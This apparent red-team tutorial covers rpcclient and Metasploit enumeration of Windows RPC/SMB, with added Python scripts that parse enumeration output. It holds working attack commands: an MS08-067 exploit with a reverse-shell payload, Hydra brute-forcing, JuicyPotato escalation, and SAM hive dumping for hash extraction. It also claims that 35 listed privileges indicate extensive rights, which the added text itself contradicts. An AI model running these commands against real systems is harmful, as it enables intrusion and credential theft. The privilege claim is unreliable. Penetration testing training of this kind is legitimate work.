
RPC Client Enumeration - Port 135

Pivoting for Red Teamers

Using rpcclient via Metasploit for Enumeration & Exploitation

rpcclient (part of the Samba suite) is a powerful tool for enumerating and interacting with Windows MS-RPC services such as SAMR and LSARPC. It is commonly used in penetration testing to extract usernames, groups, and policies from Windows machines. Note that rpcclient reaches these interfaces over SMB named pipes (TCP 445, or 139), so the target has to expose SMB, not only the endpoint mapper on port 135.

Using rpcclient Manually (Without Metasploit)

If you already have valid credentials (or null session access), you can use rpcclient from Kali Linux:

rpcclient -U "" <TARGET_IP>

or

rpcclient -U "guest" <TARGET_IP>

🔹 If it prompts for a password, just press Enter to attempt a null session login.

Common Enumeration Commands

enumdomusers   # Enumerate domain users (prints each name with its RID)
queryuser <RID>  # Get user details (RID as printed, e.g. 0x1f4; a username also works)
enumdomgroups  # Enumerate groups
querygroup <RID>  # Get group details
getsid  # Get the domain security identifier (SID)
lookupnames <USERNAME>  # Resolve a name to its SID; the last component is the RID
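The commands above print one record per line, so the natural next step is to parse that output instead of reading it by eye. The following Python script is an added example, not code from the post: it parses constructed enumdomusers, enumdomgroups and lookupnames output in the format rpcclient prints, converts the hex RIDs, splits an account SID into domain SID and RID, and flags the checks a reviewer wants first (a renamed built-in Administrator, a present Guest account, high-value groups). The sample outputs are constructed, and the function names are chosen here.

```python
import re

# Well-known RIDs worth checking in any enumeration result (Windows-defined values).
WELL_KNOWN_RIDS = {
    500: "built-in Administrator",
    501: "built-in Guest",
    502: "krbtgt",
    512: "Domain Admins",
    519: "Enterprise Admins",
}

# Constructed samples in the format rpcclient prints; not captured from a real host.
# The built-in Administrator has deliberately been renamed so the triage check fires.
ENUMDOMUSERS_OUTPUT = """\
user:[corpadmin] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[svc_backup] rid:[0x44f]
"""

ENUMDOMGROUPS_OUTPUT = """\
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Computers] rid:[0x203]
"""

# lookupnames prints: <name> <SID> (<SID type>: <type code>)
LOOKUPNAMES_OUTPUT = """\
corpadmin S-1-5-21-1111111111-2222222222-3333333333-500 (User: 1)
Domain Admins S-1-5-21-1111111111-2222222222-3333333333-512 (Domain Group: 2)
"""

_ENUM_RE = re.compile(r"^(?:user|group):\[(?P<name>.*?)\] rid:\[(?P<rid>0x[0-9a-fA-F]+)\]$")
_LOOKUP_RE = re.compile(r"^(?P<name>.+?) (?P<sid>S-1-5-[0-9-]+) \((?P<type>[^:]+): \d+\)$")


def parse_enum(output):
    """Map each name to its integer RID from enumdomusers/enumdomgroups output."""
    result = {}
    for line in output.splitlines():
        m = _ENUM_RE.match(line.strip())
        if m:
            result[m.group("name")] = int(m.group("rid"), 16)
    return result


def parse_lookupnames(output):
    """Map each looked-up name to (SID, SID type) from lookupnames output."""
    result = {}
    for line in output.splitlines():
        m = _LOOKUP_RE.match(line.strip())
        if m:
            result[m.group("name")] = (m.group("sid"), m.group("type"))
    return result


def split_sid(account_sid):
    """Return (domain SID, RID): the RID is the last sub-authority of an account SID."""
    domain, rid = account_sid.rsplit("-", 1)
    return domain, int(rid)


def triage(users, groups):
    """Flag findings a reviewer wants to see first, based only on names and RIDs."""
    findings = []
    for name, rid in users.items():
        if rid == 500 and name.lower() != "administrator":
            findings.append(f"RID 500 is named '{name}': the built-in Administrator was renamed")
        elif rid == 501:
            findings.append(f"Guest account '{name}' (RID 501) is present; confirm it is disabled")
    for name, rid in groups.items():
        if rid in (512, 519):
            findings.append(f"high-value group '{name}' ({WELL_KNOWN_RIDS[rid]}, RID {rid}); review its membership")
    return findings


if __name__ == "__main__":
    users = parse_enum(ENUMDOMUSERS_OUTPUT)
    groups = parse_enum(ENUMDOMGROUPS_OUTPUT)
    for name, (sid, kind) in parse_lookupnames(LOOKUPNAMES_OUTPUT).items():
        domain, rid = split_sid(sid)
        print(f"{name}: {kind}, domain {domain}, RID {rid}")
    for finding in triage(users, groups):
        print("-", finding)
```

Feed real output to the parsers by saving the rpcclient session (for example `rpcclient -U "" <TARGET_IP> -c "enumdomusers" > users.txt`) and reading the file; the RID check is what catches a renamed Administrator, which name-based review alone misses.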

Using Metasploit’s rpcclient Modules

Step 1: Start Metasploit

msfconsole

Step 2: Use the SMB Login Module

use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET_IP>
set USERNAME <USER>
set PASSWORD <PASS>
run

✔ If it succeeds, you can use rpcclient with the valid credentials.

Step 3: Use auxiliary/scanner/smb/smb_enumusers

use auxiliary/scanner/smb/smb_enumusers
set RHOSTS <TARGET_IP>
set SMBDomain WORKGROUP
run

✔ This retrieves a list of valid Windows usernames via SMB.

Exploiting RPC Vulnerabilities

If RPC services are misconfigured or exploitable, you can try:

🔹 MS08-067 (EternalBlue Predecessor)

use exploit/windows/smb/ms08_067_netapi
set RHOST <TARGET_IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
run

✔ This exploits an old SMB vulnerability, useful for legacy systems.

🔹 Other SMB/RPC Exploits

search rpc
search smb

Pro Tips for Effective Enumeration

  • Try null sessions (-U "") – some systems allow unauthenticated access.
  • Use smbclient to check for SMB shares:
      smbclient -L //<TARGET_IP> -N
  • Brute-force with Hydra if needed:
      hydra -L users.txt -P passwords.txt smb://<TARGET_IP>
  • Combine rpcclient + smbclient to extract more data before exploitation.

RPC Client Exploitation and Privilege Escalation

Understanding `enumprivs` in RPCClient

When you connect with rpcclient and run enumprivs at its prompt, it lists the privileges of the user:

rpcclient -U "<USERNAME>" <TARGET_IP>
rpcclient $> enumprivs

If it returns 35 privileges, it indicates that the user has extensive permissions, some of which can be exploited for privilege escalation.

High-Risk Privileges (Privilege Escalation)

Privilege Name                 | Description and Attack Scenario
-------------------------------|---------------------------------------------------------------------------
SeImpersonatePrivilege         | Allows token impersonation; can be exploited using JuicyPotato/RoguePotato.
SeAssignPrimaryTokenPrivilege  | Allows assigning tokens to processes; useful for privilege escalation.
SeBackupPrivilege              | Allows reading all files, including sensitive registry hives (SAM and SYSTEM).
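The following Python triage script is an added example, not code from the post. It parses constructed enumprivs output in the layout rpcclient prints and reports which of the three privileges in the table are present. One caveat worth building in: rpcclient's enumprivs asks the target's LSA for every privilege it defines (LsarEnumeratePrivileges), which is why a long list such as 35 entries comes back for almost any account, so the script also cross-checks a constructed `whoami /priv` listing taken as the account on the target before any privilege is counted as actually held and enabled. The function names `assess` and `confirmed_high_risk` are chosen here.

```python
import re

# High-risk privileges from the table above; the descriptions are the page's.
HIGH_RISK = {
    "SeImpersonatePrivilege": "token impersonation",
    "SeAssignPrimaryTokenPrivilege": "assign tokens to processes",
    "SeBackupPrivilege": "read all files, including SAM and SYSTEM hives",
}

# Constructed sample in the layout rpcclient's enumprivs prints (name, LUID as high:low and hex).
# rpcclient separates the columns with tabs; spaces are used here. Truncated to five entries.
ENUMPRIVS_OUTPUT = """\
found 5 privileges

SeCreateTokenPrivilege           0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege    0:3 (0x0:0x3)
SeLockMemoryPrivilege            0:4 (0x0:0x4)
SeBackupPrivilege                0:17 (0x0:0x11)
SeImpersonatePrivilege           0:29 (0x0:0x1d)
"""

# Constructed sample of `whoami /priv` run as the account in question on the target.
WHOAMI_PRIV_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

_COUNT_RE = re.compile(r"^found (\d+) privileges?$")
_PRIV_RE = re.compile(
    r"^(?P<name>Se\w+Privilege)\s+(?P<high>\d+):(?P<low>\d+)\s+\(0x[0-9a-fA-F]+:0x[0-9a-fA-F]+\)"
)
_WHOAMI_RE = re.compile(r"^(?P<name>Se\w+Privilege)\s+.*?\s+(?P<state>Enabled|Disabled)\s*$")


def parse_enumprivs(output):
    """Return (declared count, {name: (luid_high, luid_low)}) from enumprivs output."""
    declared = None
    privs = {}
    for line in output.splitlines():
        line = line.strip()
        m = _COUNT_RE.match(line)
        if m:
            declared = int(m.group(1))
            continue
        m = _PRIV_RE.match(line)
        if m:
            privs[m.group("name")] = (int(m.group("high")), int(m.group("low")))
    return declared, privs


def parse_whoami_priv(output):
    """Return {name: 'Enabled' | 'Disabled'} from whoami /priv output."""
    held = {}
    for line in output.splitlines():
        m = _WHOAMI_RE.match(line.rstrip())
        if m:
            held[m.group("name")] = m.group("state")
    return held


def assess(lsa_privs, held):
    """For each high-risk privilege: is it defined on the target, and what state does the account hold it in?"""
    return {name: {"defined": name in lsa_privs, "state": held.get(name)} for name in HIGH_RISK}


def confirmed_high_risk(report):
    """Names that are both defined on the target and enabled for the account (the ones to report)."""
    return sorted(n for n, r in report.items() if r["defined"] and r["state"] == "Enabled")


if __name__ == "__main__":
    count, privs = parse_enumprivs(ENUMPRIVS_OUTPUT)
    print(f"LSA declares {count} privileges, parsed {len(privs)}")
    report = assess(privs, parse_whoami_priv(WHOAMI_PRIV_OUTPUT))
    for name, r in report.items():
        print(f"{name}: defined={r['defined']} held={r['state']} ({HIGH_RISK[name]})")
    print("confirmed:", confirmed_high_risk(report))
```

In the constructed data only SeImpersonatePrivilege survives the cross-check: SeBackupPrivilege and SeAssignPrimaryTokenPrivilege are defined by the LSA but do not appear in the account's own privilege list, so they would be reported as "defined on the target" rather than as rights the account holds.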

Exploiting Dangerous Privileges

If you find SeImpersonatePrivilege, you can try JuicyPotato for SYSTEM access:

msfconsole
use exploit/windows/local/juicypotato
set SESSION <SESSION_ID>
run

Extracting SAM Hashes (If `SeBackupPrivilege` is Present)

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

Then use `secretsdump.py`:

python3 secretsdump.py -sam sam.save -system system.save LOCAL

🔗 Conclusion

By analyzing the privileges returned by rpcclient, attackers can exploit misconfigurations and escalate privileges to SYSTEM using tools like JuicyPotato or by extracting registry hives.
